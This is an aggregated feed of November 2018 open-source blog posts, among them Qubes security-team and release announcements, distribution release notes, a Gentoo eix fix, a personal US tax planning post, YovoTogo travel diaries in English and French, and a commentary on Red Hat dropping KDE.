Well, three of clients Corelight, Scality, and Solace are all hiring community staff for their teams. I know many of you work in community management, so I always want to share new positions here in case you want to apply. If these look interesting, you should apply via the role description – don’t send me your resume. If we know each other (as in, we are friends/associates), feel free to reach out to me if you have questions.

(These are listed alphabetically based on the company name)

Corelight Director of Community

See the role here

Corelight are doing some really interesting work. They provide security solutions based around the Bro security monitor, and they invest heavily in that community (hiring staff, sponsoring events, producing code and more). Corelight are very focused on open source and being good participants in the Bro community. This role will not just serve Corelight but also support and grow the Bro community.

Scality Technical Community Manager

See the role here

I started working with Scality a while back with the focus of growing their open source Zenko community. As I started shaping the community strategy with them, we hired for the Director Of Community role there, and my friend Stefano Maffulli got it, who had done great work at Dreamhost and OpenStack.

Well, Stef needs to hire someone for his team, and this is a role with a huge amount of potential. It will be focused on building, fostering, and growing the Zenko community, producing technical materials, working with developers, speaking, and more. Stef is a great guy and will be a great manager to work for.

Solace Director Of Community and Developer Community Evangelist

Solace have built a lightning-fast infrastructure messaging platform and they are building a community focused on supporting developers who use their platform. They are a great team, and are really passionate about not just building a community, but doing it the right way.

They are hiring for two roles. One will be leading the overall community strategy and delivery and the other will be an evangelist role focused on building awareness and developer engagement.

All three of these companies are doing great work, and really focused on building community the right way. Check out the roles and best of luck!

The post My Clients Are Hiring Community Roles: Corelight, Scality, and Solace appeared first on Jono Bacon.

05 November, 2018 06:29AM

hackergotchi for Qubes


Qubes Security Team Update

As we recently announced, Joanna Rutkowska has turned over leadership of the Qubes OS Project to Marek Marczykowski-Górecki (see Joanna’s announcement and Marek’s announcement). In this post, we’ll discuss the implications of these changes for the Qubes Security Team and how we’re addressing them.

What is the Qubes Security Team?

The Qubes Security Team (QST) is the subset of the Qubes Team that is responsible for ensuring the security of Qubes OS and the Qubes OS Project. In particular, the QST is responsible for:

As a security-oriented operating system, the QST is fundamentally important to Qubes, and every Qubes user implicitly trusts the members of the QST by virtue of the actions listed above.

How does the recent change in leadership affect the QST?

Until now, the two members of the QST have been Joanna and Marek. With Joanna’s new role at the Golem Project, she will no longer have time to function as a QST member. Therefore, Joanna will officially transfer ownership of the Qubes Master Signing Key (QMSK) to Marek, and she will no longer sign QSBs.

However, due to the nature of PGP keys, there is no way to guarantee that Joanna will not retain a copy of the QMSK after transferring ownership to Marek. Since anyone in possession of the QMSK is a potential attack vector against the project, Joanna will continue to sign Qubes Canaries in perpetuity.

With Joanna’s departure from the QST, Marek would remain as its sole member. Given the critical importance of the QST to the project, however, we believe that a single member would be insufficient. Therefore, after careful consideration, we have selected a new member for the QST from among our experienced Qubes Team members: Simon Gaiser (aka HW42).

About Simon

Simon has been a member of the Qubes Team for over two years and has been a contributor to the project since 2014. He has worked on many different parts of the Qubes codebase, including core, Xen, kernel, and GUI components. Earlier this year, he joined Invisible Things Lab (ITL) and has been gaining experience with other security projects. His thorough knowledge of Qubes OS, ability to assess the severity of security vulnerabilities, and experience preparing Xen patches make him very well-suited to the QST. Most importantly, both Joanna and Marek trust him with the responsibilities of this important role. We are pleased to announce Simon’s new role as a QST member. Congratulations, Simon, and thank you for working to keep Qubes secure!

05 November, 2018 12:00AM

Qubes OS 4.0.1-rc1 has been released!

We’re pleased to announce the first release candidate for Qubes 4.0.1! This is the first of at least two planned point releases for version 4.0. Features:

  • All 4.0 dom0 updates to date
  • Fedora 29 TemplateVM
  • Debian 9 TemplateVM
  • Whonix 14 Gateway and Workstation TemplateVMs
  • Linux kernel 4.14

Qubes 4.0.1-rc1 is available on the Downloads page.

What is a point release?

A point release does not designate a separate, new version of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.0) inclusive of all updates up to a certain point. Installing Qubes 4.0 and fully updating it results in the same system as installing Qubes 4.0.1.

What should I do?

If you’re currently using an up-to-date Qubes 4.0 installation, then your system is already equivalent to a Qubes 4.0.1 installation. No action is needed.

Regardless of your current OS, if you wish to install (or reinstall) Qubes 4.0 for any reason, then the 4.0.1 ISO will make this more convenient and secure, since it bundles all Qubes 4.0 updates to date. It will be especially helpful for users whose hardware is too new to be compatible with the original Qubes 4.0 installer.

Release candidate planning

We expect that there will be a second release candidate (4.0.1-rc2) following this one (4.0.1-rc1). The second release candidate will include a fix for the Nautilus bug reported in #4460 along with any other available fixes for bugs reported against this release candidate. As usual, you can help by reporting any bugs you encounter.

What about Qubes 3.2.1?

We announced the release of 3.2.1-rc1 one month ago. Since no serious problems have been discovered in 3.2.1-rc1, we plan to build the final version of Qubes 3.2.1 at the end of this week.

05 November, 2018 12:00AM

November 04, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

Stephen Michael Kellat: Writing Up Plan B

With the prominence of things like Liberapay and Patreon as well as, I have had to look at the tax implications of them all.  There is no single tax regime on this planet.  Developers and other freelancers who might make use of one of these services within the F/LOSS frame of reference are frequently not within the USA frame of reference.  That makes a difference.


I also have to state at the outset that this does not constitute legal advice.  I am not a lawyer.  I am most certainly not your lawyer.  If anything these recitals are my setting out my review of all this as being “Plan B” due to continuing high tensions surrounding being a federal civil servant in the United States.  With an election coming up Tuesday where one side treats it as a normal routine event while the other is regarding it as Ragnarok and is acting like humanity is about to face an imminent extinction event, changing things up in life may be worthwhile.


An instructive item to consider is Internal Revenue Service Publication 334 Tax Guide for Small Business (For Individuals Who Use Schedule C or C-EZ).  The current version can be found online at  Just because you receive money from people over the Internet does not necessarily mean it is free from taxation.  Generally the income a developer, freelance documentation writer, or a freelancer in general might receive from a Liberapay or appears to fall under “gross receipts”.  


A recent opinion of the United States Tax Court (Felton v. Commissioner, T.C. Memo 2018-168) discusses the issue of “gift” for tax purposes rather nicely in comparison to what Liberapay mentions in its FAQ.  You can find the FAQ at  The opinion can be found at  After reading the discussion in Felton, I remain assured that in the United States context anything received via Liberapay would have to be treated as gross receipts in the United States.  The rules are different in the European Union where Liberapay is based and that’s perfectly fine.  In the end I have to answer to the tax authorities in the United States.


The good part about reporting matters on Schedule C is that it preserves participation in Social Security and allows a variety of business expenses and deductions to be taken.  Regular wage-based employees pay into Social Security via the FICA tax.  Self-employed persons pay into Social Security via SECA tax.


Now, there are various works I would definitely ask for support if I left government.  Such includes:


  • Freelance documentation writing

  • Emergency Management/Homeland Security work under the aegis of my church

  • Podcast production

  • Printing & Publishing


For podcast production, general news reviews would be possible.  Going into actual entertainment programming would be nice.  There are ideas I’m still working out.


Printing & Publishing would involve getting small works into print on a more rapid cycle in light of an increasingly censored Internet.  As the case of shows, you can have one of your users do something horrible but not actually do anything as a site but still have all your hosting partners withdraw service so as to knock you offline.  Outside the context of the USA, total shutdowns of access to the Internet still occur from time to time in other countries.


Emergency Management comes under the helping works of the church.


As to documentation writing, I used to write documentation for Xubuntu.  I want to do that again.


As to the proliferation of codes of conduct that are appearing everywhere, I can only offer the following statement:


“I am generally required to obey the United States Constitution and laws of the United States of America, the Constitution of the State of Ohio and Ohio’s laws, and the orders of any commanding officers appointed to me as a member of the unorganized militia (Ohio Revised Code 5923.01(D), Title 10 United States Code Section 246(b)(2)).  Codes of Conduct adopted by projects and organizations that conflict with those legal responsibilities must either be disregarded or accommodations must otherwise be sought.”


So, that’s “Plan B”.  The dollar amounts remain flexible at the moment as I’m still waiting for matters to pan out at work.  If things turn sour at my job, I at least have plans to hit the ground running seeking contracts and otherwise staying afloat.



04 November, 2018 11:21PM

Tiago Carrondo: S01E08 – Chocos com tinta

Esta semana contámos com o Pedro Silva, que nos veio falar sobre os Linux Days que aconteceram “na Checa” e também da sua experiência como designer gráfico num mundo dominado pela Apple e Adobe ele partilhou connosco como consegue desenvolver a sua actividade profissional sem uma nem a outra. Falou-se ainda da System76, routers open-source da Passwordscon e muito mais! Já sabes: Ouve, subscreve e partilha!


Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–

Atribuição e licenças

A imagem de capa: PacificKlaus em Visualhunt e está licenciada como CC BY-NC.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

04 November, 2018 10:53PM

hackergotchi for Emmabuntüs Debian Edition

Emmabuntüs Debian Edition

YovoTogo Diary 2018 (Episode 6)

Wednesday October 1.

Today we journey to Lomé, from where Isabelle, Françoise, Clémence and Jean Marie will fly back to France Friday evening. Claude and Marie-Paule will stay here during another month to finalize various projects outside the Don Orione Center. This includes taking receipt and delivering the material currently waiting in the Lomé harbor, in order to achieve several computer rooms, a sewing and a documentation workshops within the Dapaong FabLab with our JUMP Lab’Orione partners etc.

We leave Bombouaka at 6:30 PM, riding a bus of the E.tra.B company, which offers a questionable comfort, and it takes us more than 10 hours to cross the whole country, happy viewers of the diverse Togo landscapes.

Our friend Kossivi is waiting for us at the bus station, with 2 cabs to drive us to our lodging located in the Tokoin-Witti area.

Thursday November 2.

A relaxing day at Agbodrafo, a village hemmed between the road and the lake Togo. In the morning we boarded a dugout canoe for a round trip to Togoville, sailing through the fishermen nets, and crossing the road of the gasoline traffickers coming from the Nigeria. We navigated along side the “holly wood”, which is banned to strangers. This wood is a area reserved to the animists. We had lunch, our feet almost in the water, in the shade of palm trees, and in the company of our guides and friends Elias and Kossivi.

In the afternoon we visit The Slaves House – Wells of the chained people“, called Agbodrafo or Porto Seguro, which was at the heart of the slave trade raging all along the Benin bay from the 17th to the 19th century.

In the evening we went to the Lomé beach to have a dinner surrounded by the African music beat.

Friday November 3.

Walk trough the Lomé market in the morning, lunch at noon with Father Alain KINI, manager of the Don Orione Center who stops over in Lomé returning from a seminar in Ivory Coast. Together we communicate our feelings about our journey, and our findings and upon his own request, we made some suggestions to potentially improve the Center organization. One last fresh drink on the beach in the afternoon, and this is the end of the journey for Isabelle, Françoise, Clémence and Jean Marie. Well this is what they thought, until they reach the airport where they learned that their flight was canceled due to some technical issues. They are then transferred to one of the best hotels of Lomé, with all costs covered – as usual – by the airline company. They shall take off tomorrow Saturday, in the evening.

Bye-bye Togo

This very Saturday, Marie_Paule and Claude go back to the North in the car of Father Alain Kini, who will leave them in Sokodé, at the home of their friends Yobé and Madeleine, where they are going to spend several days before going back to Dapaong. This is where they have to organize the transfer and the reception of 7 m3 (about 250 cubic feet) of sent equipments : computers, copy machines, leather, various collections of donation, etc. We forecast three official openings of training rooms, each equipped with 20 computers, as well as the startup of the sewing and embroidery workshop together with the documentation workshop. Marie_Paule and Claude will report their next actions of the News page of the YovoTogo site.

All the participants felt a lot of sharing during this solidarity journey, the Togolese people being very friendly, full of hospitality, open minded and spontaneous.

Some food purchases on our way back to Bombouaka

Life is a journey by itself, and as wrote Johann Wolfgang von Goethe :

“Do you want to be happy? Travel with 2 bags,
one to give, the other one to receive”

Extracts from : Voyage de solidarité 2018 de nos amis de YovoTogo

Image Source : YovoTogo

04 November, 2018 07:41PM by Patrick Emmabuntüs

Voyage de solidarité 2018 de nos amis de YovoTogo (Épisode 6)

Mercredi 1er novembre

Voyage aujourd’hui vers Lomé d’où Isabelle, Françoise, Clémence et Jean Marie décollerons vendredi soir pour rentrer en France. Claude et Marie-Paule resterons encore un mois pour finaliser les projets extérieurs au centre Don Orione, la réception et l’acheminement du matériel, actuellement au port de Lomé, en vue de la réalisation de plusieurs salles informatiques, d’un atelier couture et d’un atelier documentation au Fablab de Dapaong avec nos partenaires JUMP Lab’Orione etc.

Nous quittons Bombouaka à 6h30 par un bus de la compagnie E.tra.B au confort plus que sommaire, nous mettrons un peu plus de 10 heures à traverser tout le pays, heureux spectateurs des paysages variés qu’offre le Togo.

Notre ami Kossivi nous attends à la gare d’arrivée avec 2 taxis pour nous conduire à notre hébergement situé dans le quartier Tokoin-Witti.

Jeudi 2 novembre

Journée détente à Agbodrafo, un village coincé entre la route et le lac Togo. Nous avons embarqué le matin dans une pirogue pour un aller-retour à Togoville à travers les filets de pêcheurs croisant les allez et venus des trafiquants d’essence provenant du Nigéria. Avons longé la « forêt sacrée », interdite aux étrangers. Ce bois est le domaine réservé des animistes. Nous avons pris le repas du midi presque les pieds dans l’eau à l’ombre des palmiers en compagnie d’Elias et Kossivi nos amis et guides.

Visite l’après midi de « La Maison des esclaves – Wood Home – Le puits des enchaînés » Agbodrafo ou Porto Seguro a été au cœur de la traite des esclaves qui sévit tout le long du golfe du Bénin du XVIIe au XIXe siècle.

Au soir nous nous sommes rendus sur la plage de Lomé pour y manger au rythme de la musique Africaine.

Vendredi 3 novembre

Une ballade sur le marché de Lomé le matin, à midi repas pris en commun avec le père Alain KINI responsable du centre Don Orione qui de retour d’un séminaire en Côte d’Ivoire est de passage à Lomé. Nous échangeons ensemble sur notre séjour, nous lui confions nos impressions et lui rapportons nos constats en proposant quelques pistes d’amélioration future répondant à sa demande. Une dernière boisson fraîche sur la plage l’après midi et c’est la fin du séjour pour Isabelle, Françoise, Clémence et Jean Marie. Enfin c’est ce qu’ils croyaient jusqu’à l’aéroport où ils apprendront l’annulation pour raisons techniques de leur vol. Ils seront alors transférés dans l’un des plus beaux hôtels de Lomé, tous frais payés par la compagnie aérienne, comme il se doit en pareil cas. Ils partiront en fait le lendemain, samedi en fin d’après midi.

Au revoir Togo

Ce même samedi Marie Paule et Claude repartent vers le nord en voiture avec le père Alain KINI et se feront déposer à Sokodé chez leurs amis Yobé et Madeleine ou ils passeront plusieurs journées avant de rejoindre Dapaong d’où ils devront organiser le transport et réceptionner les 7 m3 de matériels envoyés, de l’informatique, du cuir, des collectes de dons, des photocopieurs etc. Trois inaugurations de salles informatiques de 20 ordinateurs chacune sont prévues ainsi que le démarrage d’un atelier couture – broderie et d’un atelier de documentation. Ils rendront compte de ces actions à venir sur la page Actualités du site.

L’ensemble des membres participant a trouvé beaucoup de partage dans ce séjour solidaire, le Togolais est très accueillant, hospitalier, ouvert et spontané.

Quelques achats de victuailles sur la route du retour à Bombouaka

La vie en elle-même est un voyage et comme l’a dit
Johann Wolfgang von Goethe :
« Veux-tu vivre heureux ? Voyage avec deux sacs,
l’un pour donner, l’autre pour recevoir »


Extrait du Voyage de solidarité 2018 de nos amis de YovoTogo

Source des images : YovoTogo

04 November, 2018 06:49PM by Patrick Emmabuntüs

YovoTogo Diary 2018 (Episode 5)

Saterday October 27.

We spend the day in Dapaong.

We pick up Émilie et Marie-Jo (they are sponsored by our association) at the Mô-Fant boarding high school of Dapaong, to basically take a walk to the town market. Like every year we use this opportunity to buy them few things to improve their daily lives. This time, we give them some cash that we let them manage by their own, and thus, they walk from one shop to another, browse the street stalls, and buy cleansing and care products, bags of vegetables, some “gari” (kind of breakfast cassava porridge), buckets and other utensils …

Jean-Marie and Claude will dare to taste the fried caterpillars, in front of amused street vendors. Well, you need to really appreciate the nutritious virtues they are supposed to bring to your body, because according to our friends, there is a long way to go, from the taste point of view …

Then we walk to the snack-bar where we meet Afo, the JUMP Lab’Orione FabLab manager and his 3 years old son. Then Émilie’s mother and uncle are joining us to take a picture of the whole group. There is a lot of guests during this day of market and the service is rather slow. We take this long waiting time to further communicate with the young girls, and then, after lunch, we bring them back to the high school.

Next, we take the direction of the “Yendube Children Hospital” staffed by the Sisters of the Hotel-Dieu. The Director Sister receives us and also accepts to guide us through the institution she manages, and where many children are hospitalized.

Back to Bombouaka where we spend the evening with the teenagers of the Father Sebastien lounge, who had prepared a meal with the food we brought them, according to their own shopping list. A warm and friendly evening together, extended by the traditional “dust ball”, conducted by Isaac, the DJ of this event.

Sunday October 28.

Devoting this morning to sport, with the disabled young people of the Father Sebastien lounge of the Saint Louis Orione Center of Bombouaka : the association hands over a tennis table, together with some equipments like rackets, balls, nets, score panels, as well as sport clothes collected and donated by a couple of associations in La-Roche-Sur-Yon, city of Vendée.

The afternoon is dedicated to the Women Leaders of Tandjouaré (AFL-Tan). These women put together their energy to raise funds to finance the local micro-credit. They manufacture in group the Néré mustard and liquid soap. Their main revenue is the contribution of 2 000 FCFA (3.05 €) per month and the interest on the loans. These three-months loans , are renewable as soon as they are repaid, and are mainly used for health care, children’s schooling, and starting up a new activity to generate some profits. Marie-Paule is a member of this group since several years and was recently joined by Françoise, Clémence and Isabelle.

A communication concerning feminine hygiene and honey patches received a great deal of attention. It was also an opportunity to dance and share Togolese local dishes, accompanied by some Tchapalo (kind of Sorghum bear).

Monday October 29.

We meet very early with Georges MOUTORE, secretary-general of the OCDI (Charity Organization for an Complete Development) Caritas Togo of Dapaong, and like several years now, we give to him the collection of 2 000 eye glasses, which then will be calibrated, indexed and refurbished for the most disadvantaged people, by César BOUKONTI, the technician of the “Light Road” optical workshop in the Dapaong hospital.

Today we make our last visit to a family where disabled children are monitored by the Center. We go to Christine’s and Merveille’s places.

Christine consulted the first time at the Center in May 2016. It resulted from this visit that she suffers from a tetraplegia and a lateral decubitus. This girl is very smart and despite her disability she goes to the local high school of her village. She cannot seat down, but the Center gave her a chair more or less adapted to her handicap, which enables her to attend school. She is also very nice girl, but she needs a lifetime assistance, because she does not have the capability to carry out activities of daily living. However, she speaks correctly and stubbornly refuses to go back to the Center, and prefers living within her family. It is a very complex situation to manage, for both the family and the Center following her.

Merveille suffers from a bilateral equinus foot deformity, a congenital handicap. In a first step she received successive cast corrections, and then she was operated during a mission of orthopedic and plastic surgeons, organized in 2008 by the ” Saint Louis Orione” Center. She was hosted in October 2012 in the “Padre Pio Village” boarding school of the Center, for a better care of her education. Today she is 11 years old, she walks almost normally, and attend the high school with no difficulty at all.

Tuesday October 30.

The project, including assembly, welding, painting and finishing touches, being completed, at 8 PM this morning, the young guys of the welding workshop rush to bring their art works on the intended location in the Don Orione Center. Previously, they had loaded a cart with red sand which is then spread out on the floor to install their works.

Unanimously, this set of art works is called “Back to the fields”. A villager on his bike, another standing up, and an imaginary little animal, form this original scene …

Finally, each other in turn, or all together, they pose for a picture next to their designs. 

It is a very positive feed-back : the young welder and Maxime thank me with drawings and words which, most of them, carry happiness and self-appreciation values for having learned how to make and discovered now things.

They expressed their wish : the design project must continue. And, in return, I also learned a lot about their way of life and their daily work, with their own means …

Jean Marie

In the mean time … After the completion of the various job descriptions, we organized a well appreciated meeting with the nursing staff and the physiotherapists, to propose a new work organization. This could allow a continuous attendance in the Center, a better monitoring of the histed people and the optimization of the individual support.

Then we exchange ideas with Father Pierre, about the Center operations (work organization, management, children of the Cottolengo lounge , security issues, etc.) and we explore ways to improve. This meeting unveiled the necessity and the desire to change the current practices.


Together with Tchaou and Maurice, in the social service.


Extracts from : Voyage de solidarité 2018 de nos amis de YovoTogo

Image Source : YovoTogo

04 November, 2018 06:41PM by Patrick Emmabuntüs

Voyage de solidarité 2018 de nos amis de YovoTogo (Épisode 5)

Samedi 27 octobre (Journée à Dapaong)

Nous prenons en charge Émilie et Marie-Jo (parrainées par l’intermédiaire de l’association) au Collège Mô-Fant de Dapaong ou elles sont en internat pour une ballade essentiellement sur le marché de la ville. Comme chaque année c’est l’occasion de leur faire quelques achats dans le but d’améliorer leur ordinaire. Cette fois-ci nous leur remettons une somme d’argent que nous leur laissons gérer, ainsi elles nous mènerons de boutique en boutique, d’étal en étal où elles achètent, produits de toilette, d’entretien, provision de légumes, de gari (genre de bouillie de manioc), des seaux et autres ustensiles…

Jean-Marie et Claude franchirons le pas pour goûter des chenilles frites sous le regard amusé des commerçantes. Bon, faut aimer et apprécier les vertus nourricières qu’elles sont sensées apporter car franchement, selon eux, gustativement parlant, c’est loin d’être ça …

Rendez vous au maki ensuite pour le repas du midi, où nous sommes rejoints par Afo le Fablab manager de JUMP Lab’Orione accompagné de son fils de 3 ans. Nous sommes ensuite rejoints, le temps d’une photo de groupe, par la maman d’Émilie et son oncle de passage dans le secteur. Il y a du monde ce jour de marché et le service est long. Nous mettons à profit l’attente pour échanger avec les jeunes filles que nous raccompagnons ensuite au collège.

Ensuite direction « l’Hôpital d’Enfants Yendube » tenu par les « Sœurs Hospitalières ». La directrice de l’établissement nous reçoit et consent à nous faire la visite guidée de son établissement où de nombreux enfants sont hospitalisés.

De retour à Bombouaka nous partageons la soirée avec les jeunes adolescents du foyer père Sébastien qui nous ont préparé le repas avec les victuailles que nous leur avons fourni selon une liste établie par eux. Une soirée très sympathique et chaleureuse qui se poursuivra par le traditionnel « bal poussière » orchestré par Isaac, le DJ de la soirée.

Dimanche 28 octobre

Matinée « sport » avec les jeunes en situation de handicap du Foyer père Sébastien du Centre Saint Louis Orione de Bombouaka : remise d’une table de ping-pong par l’association en complément du matériel de tennis de table, raquettes, balles, filets, panneaux de scores et des vêtements de sport collectés et offerts par la section Ping-pong de l’A.S.R.Y. (Association Sportive des Retraités Yonnais) de La Roche-sur-Yon et de 15 maillots de football offert par l’IME des Terres Noires à la Roche-sur-Yon 85.

L’après midi est consacrée aux Femmes Leaders de Tandjouaré (AFL-Tan). Ces femmes regroupent leur énergie pour collecter des fonds afin de pouvoir financer des micro-crédits. En groupe elles fabriquent de la moutarde de Néré et du savon liquide. Leur principal revenu est la cotisation de 2.000 FCFA/mois soit 3,05 € et les intérêts des prêts. Ces prêts, sur 3 mois renouvelables dès qu’ils sont remboursés servent principalement à la santé, à la scolarisation des enfants et au démarrage d’une activité génératrice de revenu. Marie Paule qui fait partie de ce groupe depuis plusieurs années a été rejointe cette année par Françoise, Clémence et Isabelle.

Une information sur l’hygiène féminine et les pansements au miel a suscité beaucoup d’attention. L’après midi a aussi été l’occasion de danser et de partager des spécialités Togolaises accompagnées de Tchapalo.

Lundi 29 octobre

Très tôt nous avons rendez vous avec Georges MOUTORE secrétaire général de l’OCDI (Organisation de la Charité pour un Développement Intégral) Caritas Togo de Dapaong et comme depuis plusieurs années nous lui remettons une collecte de près de 2.000 lunettes qui seront calibrées, répertoriées et reconditionnées pour les plus démunis par César BOUKONTI le technicien de l’atelier Optique « Route de la lumière » à l’hôpital de DAPAONG.

Aujourd’hui dernière visite en famille d’enfants en situation de handicap suivis par le centre. Nous nous rendons chez Christine et chez Merveille.

Christine a été consultée pour la première fois le 4 mai 2016 au centre. De cette consultation il est ressorti qu’elle souffre d’une tétraplégie et d’un décubitus latéral. C’est une fille très intelligente malgré sa déficience, elle est actuellement dans le collège d’initiative locale de son village. Elle n’arrive pas à s’asseoir, le centre lui a trouvé un fauteuil plus ou moins adapté à sa déficience pour lui permettre de continuer les classes. C’est une fille très gentille, mais qui a besoin d’une assistance à vie car elle n’a pas la capacité de faire les activités de la vie quotidienne. Néanmoins elle s’exprime correctement et refuse obstinément de réintégrer le centre préférant vivre auprès de sa famille. C’est une situation très compliquée à gérer, pour tous, aussi bien la famille que le centre qui la suit.

Merveille était atteinte de Pieds Equin Bilatéral congénital comme handicap. Elle avait dans un premier temps bénéficié de corrections plâtrées successives puis opérée lors d’une mission de chirurgie orthopédique et plastique des médecins, organisée par le Centre « Saint Louis Orione» en 2008. Accueillie à l’internat « Village Padre Pio » du Centre en octobre 2012 pour une meilleure prise en charge de sa scolarisation, et aujourd’hui âgée de 11 ans, elle marche presque normalement et fréquente le collège sans difficulté.

Mardi 30 octobre

Le projet d’assemblage, soudure, peinture et finitions étant terminé, ce matin vers 8h00 les jeunes de l’atelier soudure s’empressent à ramener leur « œuvre » sur l’emplacement prévu au centre Don Orione. Auparavant ils chargent du sable rouge dans une charrette qu’ils étalement ensuite pour y installer leur travaux.

Les créations sont baptisées à l’unanimité « Retour des champs ». Un villageois sur son vélo, un autre debout et un petit animal imaginaire constituent cette scène originale…

Enfin chacun à tour de rôle, ou bien en groupe, ils s’empressent de poser auprès de leurs créations pour se faire prendre en photo.

C’est un grand retour positif, les jeunes soudeurs et Maxime me remercient par des dessins et des mots qui pour la plupart d’entre eux sont porteurs de joie et de sentiments de valorisation pour avoir appris à « faire » et à « découvrir » de nouvelles choses.

Ils l’ont dit : le projet de création doit continuer et j’ai également beaucoup appris de leur façon de vivre et de travailler quotidiennement avec les moyens qui sont les leurs…

Jean Marie

Pendant ce temps…

Après avoir finalisé les entretiens en vue d’élaborer les fiches de poste, une dernière rencontre avec le personnel de l’infirmerie et les kinésithérapeutes pour présenter une proposition d’organisation de travail a été appréciée. Cette dernière permettrait d’assurer une présence en continu sur le centre, un meilleur suivi des personnes accueillies et l’optimisation de leur accompagnement.

Puis c’est avec le père Pierre qu’un échange sur le fonctionnement du centre (organisation du travail, management, enfants du Cottolengo, sécurité etc.) et l’exploration des pistes pour son amélioration, a permis de révéler la nécessité et l’ambition de changer de pratiques.


Avec Tchaou et Maurice au service social

Extrait du Voyage de solidarité 2018 de nos amis de YovoTogo

Source des images : YovoTogo

04 November, 2018 06:32PM by Patrick Emmabuntüs

hackergotchi for Ubuntu developers

Ubuntu developers

Santiago Zarate: gentoo eix-update failure


If you are having the following error on your Gentoo system:

 Can't open the database file '/var/cache/eix/portage.eix' for writing (mode = 'wb') 

Don’t waste your time, simply the /var/cache/eix directory is not present and/or writeable by the eix/portage use

mkdir -p /var/cache/eix
chmod +w /var/cache/eix*

Basic story is that eix will drop privileges to portage user when ran as root.

04 November, 2018 12:00AM

November 03, 2018

hackergotchi for Parrot Security

Parrot Security

Parrot 4.3 Release Notes

Parrot 4.3 is now available for download. This release provides security and stability updates and is the starting point for our plan to develop an LTS edition of Parrot.   Our plans for Parrot LTS We are working on a Parrot LTS branch, a long term support, release-based distribution to provide long term reliability to […]

03 November, 2018 06:32PM by palinuro

hackergotchi for SparkyLinux


Upgrade Checker 0.1.10

There is an update of Sparky APTus Upgrade Checker 0.1.10 available in our repos.

The Upgrade Checker checks package lists and displays an information about new updates, in a small graphical window.

The latest version provides such changes:

1. Clicking on the “Yes” button to run Sparky Upgrade tool needs root password to be entered now. So it is more secure than before, and no one can make such changes on your machine now.

2. Added System Upgrade Scheduler which is available from menu-> System.
It lets you add a cron job of the system upgrade and remove it as well.

The tool can configure checking update time every 1, 2, 4, 8 or 12 hours.

sudo apt update
sudo apt install sparky-aptus-upgrade-checker

Additional packages to be useful with the cron tool:
– tksuss (on GTK based desktops) or
– menu + kde-runtime (on KDE/LXQt desktops).

System Upgrade Scheduler


03 November, 2018 05:12PM by pavroo

hackergotchi for Pardus


Pardus 17.4 Sürümü Yayınlandı

TÜBİTAK ULAKBİM tarafından geliştirilmeye devam edilen Pardus’un 17.4 sürümü yayınlandı.

Pardus’un son sürümü 300’den fazla paket için iyileştirme, kararlılık ve güvenlik güncellemelerini içermektedir. Kullanıcıların en çok kullandığı uygulamaların sürümleri öncelikle Firefox 60.3.0’a, Thunderbird 60.2.1’e, VLC 3.0.3’e, Libreoffice 6.1.3’e yükseltildi. Ayrıca, 17.4 yalın/sunucu sürümünde önceki sürümlerden farklı olarak openssh-server paketi sistemde kurulu olarak gelmektedir. Bu sayede sistem yöneticilerinin “Ansible” gibi “Provisioning” araçlarını kurulumdan itibaren kullanabilmesine olanak sağlandı.

Yapılan değişiklikleri yüklemek için Pardus 17 yüklü sisteminizi güncel tutmanız yeterlidir.

Yenilikler nelerdir?

  • Son kullanıcının karşılaştığı bir çok grafiksel arayüzdeki kullanım senaryosu sorunları giderildi.
  • Bir çok sistem performansını etkileyen paket güncelleştirmesi ve optimizasyonu yapıldı.
  • 300 ün üzerinde paketi ve yamasını içeren güvenlik güncelleştirmeleri sisteme eklendi.
  • Öntanımlı internet tarayıcısı Firefox versiyonu 60.3.0’a güncellendi.
  • Öntanımlı e-posta istemcisi Thunderbird versiyonu 60.2.1’e güncellendi.
  • Öntanımlı media oynatıcısı olan VLC versiyonu 3.0.3’e güncellendi.
  • Öntanımlı ofis döküman uygulaması Libreoffice versiyonu 6.1.3’e güncellendi.
  • Yalın Sunucu sürümünde openssh-server öntanımlı olarak yüklü gelmesi sağlandı.
  • İnternet ortamı olmayan kurulum senaryolarında, kurulum sonrası kaynak listesi bozukluğu giderildi.
  • Açılış ekranı öntanımlı arka planı değiştirildi.

Pardus 17.4’ü hemen şimdi indirebilir, bu sürüm hakkında detaylı bilgi edinmek için sürüm notlarını inceleyebilirsiniz.

03 November, 2018 10:06AM by Gökhan Gurbetoğlu

November 02, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

Jonathan Riddell: Red Hat and KDE

By a strange coincidence the news broke this morning that RHEL is deprecating KDE. The real surprise here is that RHEL supported KDE all.  Back in the 90s they were entirely against KDE and put lots of effort into our friendly rivals Gnome.  It made some sense since at the time Qt was under a not-quite-free licence and there’s no reason why a company would want to support another company’s lock in as well as shipping incompatible licences.  By the time Qt become fully free they were firmly behind Gnome.  Meanwhile Rex and a team of hard working volunteers packaged it anyway and gained many users.  When Red Hat was turned into the all open Fedora and the closed RHEL, Fedora was able to embrace KDE as it should but at some point the Fedora Next initiative again put KDE software in second place. Meanwhile RHEL did use Plasma 4 and hired a number of developers to help us in our time of need which was fabulous but all except one have left some time ago and nobody expected it to continue for long.

So the deprecation is not really new or news and being picked up by the news is poor timing for Red Hat, it’s unclear if they want some distraction from the IBM news or just The Register playing around.  The community has always been much better at supporting out software for their users, maybe now the community run EPEL archive can include modern Plasma 5 instead of being stuck on the much poorer previous release.

Plasma 5 is now lightweight and feature full.  We get new users and people rediscovering us every day who report it as the most usable and pleasant way to run their day.  From my recent trip in Barcelona I can see how a range of different users from university to schools to government consider Plasma 5 the best way to support a large user base.  We now ship on high end devices such as the KDE Slimbook down to the low spec value device of Pinebook.  Our software leads the field in many areas such as video editor Kdenlive, or painting app Krita or educational suite GCompris.  Our range of projects is wider than ever before with textbook project WikiToLearn allowing new ways to learn and we ship our own software through KDE Windows, Flatpak builds and KDE neon with Debs, Snaps and Docker images.

